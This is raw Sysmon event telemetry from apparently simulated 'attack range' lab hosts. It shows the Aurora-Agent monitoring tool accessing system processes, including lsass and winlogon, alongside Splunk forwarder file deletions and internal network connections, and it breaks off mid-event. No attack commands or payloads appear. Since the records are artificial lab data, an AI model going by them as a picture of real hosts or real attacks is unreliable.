Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018425Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.704{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018424Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.680{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018423Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.676{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018422Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.662{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018421Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.657{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018420Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.645{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018419Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.638{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018418Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.630{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018417Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.620{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018416Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.613{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018415Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.588{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018414Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.581{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018413Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.569{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018412Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.562{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018411Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.555{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018410Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.548{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018409Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.540{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018408Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.538{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 354300x800000000000000018407Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:00.021{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50178-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018406Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.202{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F0A8A9CD344EAC6B1C7ACCBC2A47837,SHA256=71FA3595D4B5A4ED54C6714D44B1CC3E4B1FA1EB6344D54377EE27F03267C25A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018439Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:03.603{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0AD2E1BBCAB8D476127726626608362,SHA256=5A955B3BC0CEB4C9CE1B15827FD04FEAA99371F7CFBE704DEC52027AC541B0E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018441Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:04.679{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B75AD0F70C3843EA652CFDB24037A4DC,SHA256=0D65C667103C5AFFD538198C720A7B1FE93012D5D9B6243756D21FE20E29D9F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046166Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:04.006{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DDA5BDD78189FEF32D21AFF939609B8,SHA256=536E65605F92BECBFB7A107767BB90DFB3B80269E771E53E833BA5FC3ACA8DE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018440Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:04.226{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018442Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:05.778{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28E570CC971B9D79E0763E009BE7BA5F,SHA256=D1FF89CF4D0BF2CA195F0C4A3D4EE7C3D94FC9D94A1DC4C14FBEA1DF99B4AD48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046167Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:05.087{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51AB6329036FBFC775993846ED4A1E4F,SHA256=8D8AFDCB3035C99645C25923E3085805D3F1390589E43FB925AED39936E92FEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018444Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:06.858{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFEA62F63FD2342D439988137D35B910,SHA256=5540F653B4495B534DBCAE07150C8369AA1DCD3BC9AA7C989F62734410EA97E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046168Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:06.287{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ECA2C39F26978FCECF9CA415B3C2F54,SHA256=65A952CAF1CEAE13D62A4EB486C1A56826EA3EFD4ADDFCA230A2A2A7ADA28794,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018443Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:04.085{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50179-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8089- 23542300x800000000000000018445Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:07.936{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D85FEC28413D29CE5A3467C2F51C2E2,SHA256=E997B7675A4C02F7C50103E206FEBDE875CF80ACA00814ADE515D5C78824B939,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046169Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:07.373{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=685F8D72DCC25AB5F9A9CBC8631AB6BF,SHA256=BDA68C50220E23192E1E6F3703CB0024BE92929281674EBCBE5F925E4514E896,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046171Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:08.472{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40AA8B6B7279B320FE9B28D9B0DA0E2C,SHA256=E1A0C32C381B48FB22DDF47E7277CC57031CFC5D09BDE623BE566F8A222FE2D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018446Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:05.918{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50180-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 354300x800000000000000046170Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:05.678{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56456-false10.0.1.12-8000- 23542300x800000000000000046172Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:09.573{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A530D152E38DF148122C8B72F668326F,SHA256=9738C1E1CC993DE17AB6B34B2748B2A1A25CB5B828DC13F6B85C8C7BD4FD04D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018447Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:09.018{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C7E78B4689F0865E75E7BD4241E51F3,SHA256=4215596E98B3E036D421DE5447F45065CC609535007FD6EDB725903F4E2B999D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046173Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:10.654{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9D73D7493AFF5BB730A8C3B646AD433,SHA256=F7DF0E68B0C9879898C8130F9CFD42A51F49A3B9D972F9FBD6B601A0E38C13B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018448Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:10.099{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68B4AC0155D0B27BB04F9D386F550454,SHA256=82170818E3F2CA39C13887EE5F0909C65D425742ADBE03685435E111BBAD87CE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046198Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.934{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program 